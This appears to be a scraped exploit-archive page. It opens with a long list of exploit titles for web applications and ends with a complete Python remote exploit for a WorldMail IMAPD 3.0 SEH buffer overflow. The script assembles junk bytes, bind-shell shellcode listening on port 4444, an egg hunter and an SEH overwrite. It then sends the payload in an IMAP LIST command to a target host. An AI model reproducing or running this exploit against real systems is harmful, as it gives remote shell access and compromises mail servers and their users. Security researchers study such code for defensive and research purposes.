Parameter SQL Injection gpEasy CMS 'section' Parameter Cross-Site Scripting gpEasy CMS - 'section' Parameter Cross-Site Scripting iCart Pro 'section' Parameter SQL Injection iCart Pro - 'section' Parameter SQL Injection WordPress WP-Table Reloaded Plugin 'id' Parameter Cross-Site Scripting WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting WordPress CommentLuv Plugin '_ajax_nonce' Parameter Cross-Site Scripting WordPress CommentLuv Plugin - '_ajax_nonce' Parameter Cross-Site Scripting WordPress Audio Player Plugin 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme 'tab' Parameter Cross-Site Scripting WordPress Audio Player Plugin - 'playerID' Parameter Cross-Site Scripting WordPress Pinboard Theme - 'tab' Parameter Cross-Site Scripting Squirrelcart 'table' Parameter Cross-Site Scripting Squirrelcart - 'table' Parameter Cross-Site Scripting OpenEMR 'site' Parameter Cross-Site Scripting OpenEMR - 'site' Parameter Cross-Site Scripting WordPress Uploader Plugin 'blog' Parameter Cross-Site Scripting WordPress Uploader Plugin - 'blog' Parameter Cross-Site Scripting WordPress Count Per Day Plugin 'daytoshow' Parameter Cross-Site Scripting WordPress Count Per Day Plugin - 'daytoshow' Parameter Cross-Site Scripting WordPress podPress Plugin 'playerID' Parameter Cross-Site Scripting WordPress podPress Plugin - 'playerID' Parameter Cross-Site Scripting Jaow CMS 'add_ons' Parameter Cross-Site Scripting Jaow CMS - 'add_ons' Parameter Cross-Site Scripting WordPress Feedweb Plugin 'wp_post_id' Parameter Cross-Site Scripting WordPress Feedweb Plugin - 'wp_post_id' Parameter Cross-Site Scripting Symphony 'sort' Parameter SQL Injection Symphony - 'sort' Parameter SQL Injection WordPress Traffic Analyzer Plugin 'aoid' Parameter Cross-Site Scripting WordPress Traffic Analyzer Plugin - 'aoid' Parameter Cross-Site Scripting WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection WordPress Spiffy XSPF Player Plugin - 'playlist_id' Parameter SQL Injection WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Request Tracker 'ShowPending' Parameter SQL Injection WordPress Spider Video Player Plugin - 'theme' Parameter SQL Injection Request Tracker - 'ShowPending' Parameter SQL Injection Fork CMS 'file' Parameter Local File Inclusion Fork CMS - 'file' Parameter Local File Inclusion WordPress wp-FileManager Plugin 'path' Parameter Arbitrary File Download Open Flash Chart 'get-data' Parameter Cross-Site Scripting WordPress wp-FileManager Plugin - 'path' Parameter Arbitrary File Download Open Flash Chart - 'get-data' Parameter Cross-Site Scripting Jojo CMS 'search' Parameter Cross-Site Scripting Jojo CMS - 'search' Parameter Cross-Site Scripting WordPress Ambience Theme 'src' Parameter Cross-Site Scripting WordPress Ambience Theme - 'src' Parameter Cross-Site Scripting TaxiMonger for Android 'name' Parameter HTML Injection TaxiMonger for Android - 'name' Parameter HTML Injection ZamFoo 'date' Parameter Remote Command Injection ZamFoo - 'date' Parameter Remote Command Injection Xorbin Analog Flash Clock 'widgetUrl' Parameter Cross-Site Scripting Xorbin Analog Flash Clock - 'widgetUrl' Parameter Cross-Site Scripting WordPress WP Feed Plugin 'nid' Parameter SQL Injection WordPress Category Grid View Gallery Plugin 'ID' Parameter Cross-Site Scripting WordPress WP Feed Plugin - 'nid' Parameter SQL Injection WordPress Category Grid View Gallery Plugin - 'ID' Parameter Cross-Site Scripting WordPress FlagEm Plugin 'cID' Parameter Cross-Site Scripting WordPress FlagEm Plugin - 'cID' Parameter Cross-Site Scripting Xibo 'layout' Parameter HTML Injection Xibo - 'layout' Parameter HTML Injection Flo CMS 'archivem' Parameter SQL Injection Flo CMS - 'archivem' Parameter SQL Injection eTransfer Lite 'file name' Parameter HTML Injection WordPress mukioplayer4wp Plugin 'cid' Parameter SQL Injection eTransfer Lite - 'file name' Parameter HTML Injection WordPress mukioplayer4wp Plugin - 'cid' Parameter SQL Injection Monstra CMS 'login' Parameter SQL Injection Monstra CMS - 'login' Parameter SQL Injection Joomla! JVideoClip Component 'uid' Parameter SQL Injection Joomla! JVideoClip Component - 'uid' Parameter SQL Injection WordPress WP-Realty Plugin 'listing_id' Parameter SQL Injection WordPress WP-Realty Plugin - 'listing_id' Parameter SQL Injection Joomla! Maian15 Component 'name' Parameter Arbitrary Shell Upload Joomla! Maian15 Component - 'name' Parameter Arbitrary Shell Upload Nagios XI 'tfPassword' Parameter SQL Injection Nagios XI - 'tfPassword' Parameter SQL Injection Enorth Webpublisher CMS 'thisday' Parameter SQL Injection Enorth Webpublisher CMS - 'thisday' Parameter SQL Injection WordPress Easy Career Openings Plugin 'jobid' Parameter SQL Injection WordPress Easy Career Openings Plugin - 'jobid' Parameter SQL Injection eduTrac 'showmask' Parameter Directory Traversal eduTrac - 'showmask' Parameter Directory Traversal Veno File Manager 'q' Parameter Arbitrary File Download Veno File Manager - 'q' Parameter Arbitrary File Download Leed 'id' Parameter SQL Injection Leed - 'id' Parameter SQL Injection xBoard 'post' Parameter Local File Inclusion xBoard - 'post' Parameter Local File Inclusion i-doit Pro 'objID' Parameter SQL Injection i-doit Pro - 'objID' Parameter SQL Injection Joomla! Sexy Polling Extension 'answer_id' Parameter SQL Injection Joomla! Sexy Polling Extension - 'answer_id' Parameter SQL Injection XOS Shop 'goto' Parameter SQL Injection XOS Shop - 'goto' Parameter SQL Injection Eventum 'hostname' Parameter Remote Code Execution Eventum - 'hostname' Parameter Remote Code Execution WordPress Relevanssi Plugin 'category_name' Parameter SQL Injection WordPress Relevanssi Plugin - 'category_name' Parameter SQL Injection Professional Designer E-Store 'id' Parameter Multiple SQL Injection Professional Designer E-Store - 'id' Parameter Multiple SQL Injection MeiuPic 'ctl' Parameter Local File Inclusion MeiuPic - 'ctl' Parameter Local File Inclusion Jorjweb 'id' Parameter SQL Injection qEngine 'run' Parameter Local File Inclusion Jorjweb - 'id' Parameter SQL Injection qEngine - 'run' Parameter Local File Inclusion Seo Panel 'file' Parameter Directory Traversal Seo Panel - 'file' Parameter Directory Traversal ZeusCart 'prodid' Parameter SQL Injection ZeusCart - 'prodid' Parameter SQL Injection VoipSwitch 'action' Parameter Local File Inclusion VoipSwitch - 'action' Parameter Local File Inclusion Joomla! Spider Video Player Extension 'theme' Parameter SQL Injection Joomla! Spider Video Player Extension - 'theme' Parameter SQL Injection Microsoft Office Excel Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Office Excel - Out-of-Bounds Read Remote Code Execution (MS16-042) Microsoft Office Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099) FreePBX 13 / 14 - Remote Code Execution Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution (Multithreaded Scanner) (2) Easy FTP Server - _APPE_ Command Buffer Overflow Remote Exploit
91 lines
No EOL
4.2 KiB
Python
Executable file
91 lines
No EOL
4.2 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# -*- coding: latin-1 -*- # ####################################################
|
|
# ____ _ __ #
|
|
# ___ __ __/ / /__ ___ ______ ______(_) /___ __ #
|
|
# / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / #
|
|
# /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / #
|
|
# /___/ nullsecurity team #
|
|
# #
|
|
# wm-imapd.py - WorldMail IMAPD remote exploit #
|
|
# #
|
|
# DATE #
|
|
# 09/01/2012 #
|
|
# #
|
|
# DESCRIPTION #
|
|
# WorldMail IMAPD - SEH overflow - remote exploit #
|
|
# #
|
|
# AUTHOR #
|
|
# TheXero - http://www.nullsecurity.net/ #
|
|
# #
|
|
################################################################################
|
|
|
|
import sys
|
|
import socket
|
|
|
|
## Exploit Title: WorldMail imapd 3.0 SEH overflow (egg hunter)
|
|
## Tested on: XP SP3 en-us
|
|
## Author: TheXero
|
|
## Website: www.thexero.co.uk
|
|
## http://www.nullsecurity.net
|
|
|
|
## Check for parameters
|
|
if len(sys.argv) != 3:
|
|
print "Usage: " + sys.argv[0] + " 127.0.0.1 143"
|
|
quit()
|
|
|
|
## Assigns the parameters
|
|
target = sys.argv[1]
|
|
port = int(sys.argv[2])
|
|
|
|
## Sets up the socket
|
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
|
|
## Sets the variables
|
|
char = "}"
|
|
nseh = "\xeb\x06\x90\x90"
|
|
seh = "\x4e\x3b\x01\x10" ## 10013B4E |. 59 POP ECX mailcmn.dll
|
|
buffer = '\x90' * 8
|
|
shellcode = ("T00WT00W" ## Bindshell port 4444
|
|
"\xbd\xe8\x39\x05\xa5\xdb\xdb\xd9\x74\x24\xf4\x58\x29\xc9\xb1"
|
|
"\x56\x31\x68\x13\x03\x68\x13\x83\xc0\xec\xdb\xf0\x59\x04\x92"
|
|
"\xfb\xa1\xd4\xc5\x72\x44\xe5\xd7\xe1\x0c\x57\xe8\x62\x40\x5b"
|
|
"\x83\x27\x71\xe8\xe1\xef\x76\x59\x4f\xd6\xb9\x5a\x61\xd6\x16"
|
|
"\x98\xe3\xaa\x64\xcc\xc3\x93\xa6\x01\x05\xd3\xdb\xe9\x57\x8c"
|
|
"\x90\x5b\x48\xb9\xe5\x67\x69\x6d\x62\xd7\x11\x08\xb5\xa3\xab"
|
|
"\x13\xe6\x1b\xa7\x5c\x1e\x10\xef\x7c\x1f\xf5\xf3\x41\x56\x72"
|
|
"\xc7\x32\x69\x52\x19\xba\x5b\x9a\xf6\x85\x53\x17\x06\xc1\x54"
|
|
"\xc7\x7d\x39\xa7\x7a\x86\xfa\xd5\xa0\x03\x1f\x7d\x23\xb3\xfb"
|
|
"\x7f\xe0\x22\x8f\x8c\x4d\x20\xd7\x90\x50\xe5\x63\xac\xd9\x08"
|
|
"\xa4\x24\x99\x2e\x60\x6c\x7a\x4e\x31\xc8\x2d\x6f\x21\xb4\x92"
|
|
"\xd5\x29\x57\xc7\x6c\x70\x30\x24\x43\x8b\xc0\x22\xd4\xf8\xf2"
|
|
"\xed\x4e\x97\xbe\x66\x49\x60\xc0\x5d\x2d\xfe\x3f\x5d\x4e\xd6"
|
|
"\xfb\x09\x1e\x40\x2d\x31\xf5\x90\xd2\xe4\x5a\xc1\x7c\x56\x1b"
|
|
"\xb1\x3c\x06\xf3\xdb\xb2\x79\xe3\xe3\x18\x0c\x23\x2a\x78\x5d"
|
|
"\xc4\x4f\x7e\x70\x48\xd9\x98\x18\x60\x8f\x33\xb4\x42\xf4\x8b"
|
|
"\x23\xbc\xde\xa7\xfc\x2a\x56\xae\x3a\x54\x67\xe4\x69\xf9\xcf"
|
|
"\x6f\xf9\x11\xd4\x8e\xfe\x3f\x7c\xd8\xc7\xa8\xf6\xb4\x8a\x49"
|
|
"\x06\x9d\x7c\xe9\x95\x7a\x7c\x64\x86\xd4\x2b\x21\x78\x2d\xb9"
|
|
"\xdf\x23\x87\xdf\x1d\xb5\xe0\x5b\xfa\x06\xee\x62\x8f\x33\xd4"
|
|
"\x74\x49\xbb\x50\x20\x05\xea\x0e\x9e\xe3\x44\xe1\x48\xba\x3b"
|
|
"\xab\x1c\x3b\x70\x6c\x5a\x44\x5d\x1a\x82\xf5\x08\x5b\xbd\x3a"
|
|
"\xdd\x6b\xc6\x26\x7d\x93\x1d\xe3\x8d\xde\x3f\x42\x06\x87\xaa"
|
|
"\xd6\x4b\x38\x01\x14\x72\xbb\xa3\xe5\x81\xa3\xc6\xe0\xce\x63"
|
|
"\x3b\x99\x5f\x06\x3b\x0e\x5f\x03")
|
|
|
|
## Calculates the size of junk depending on the shellcode
|
|
junk = "\x41" * (769 - len(shellcode))
|
|
|
|
## Egg Hunter
|
|
hunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
|
|
"\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
|
|
|
|
## Assembles the buffer
|
|
buffer = char + junk + shellcode + nseh + seh + hunter + char
|
|
|
|
## Connects
|
|
s.connect((target,port))
|
|
data=s.recv(1024)
|
|
s.send("a001 LIST " + buffer + "\r\n")
|
|
s.close()
|
|
|
|
# EOF |